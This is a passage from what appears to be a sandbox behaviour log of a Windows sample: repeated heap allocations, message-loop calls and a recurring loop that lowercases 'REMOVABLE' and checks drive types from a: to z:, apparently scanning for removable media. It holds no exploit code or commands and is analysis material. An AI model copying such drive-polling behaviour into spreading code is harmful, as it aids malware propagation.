hHeap=0x12c0000) returned 1 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.719] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.719] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.719] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.719] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.719] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.719] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.719] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0215.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0215.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.720] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.720] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.721] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.721] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.721] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.721] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.721] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.721] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.722] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.723] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.724] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0215.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0215.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.725] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.726] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.726] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.726] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0215.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.728] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.728] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.728] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.728] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.728] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.729] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.729] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.729] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.729] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.729] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.729] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.730] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.731] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.732] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.732] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0215.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0215.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.733] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.733] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.733] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.734] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.734] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.734] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.734] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.734] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.734] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.734] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.734] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.735] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.736] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.737] GetDriveTypeW (lpRootPathName="v:\\") returned 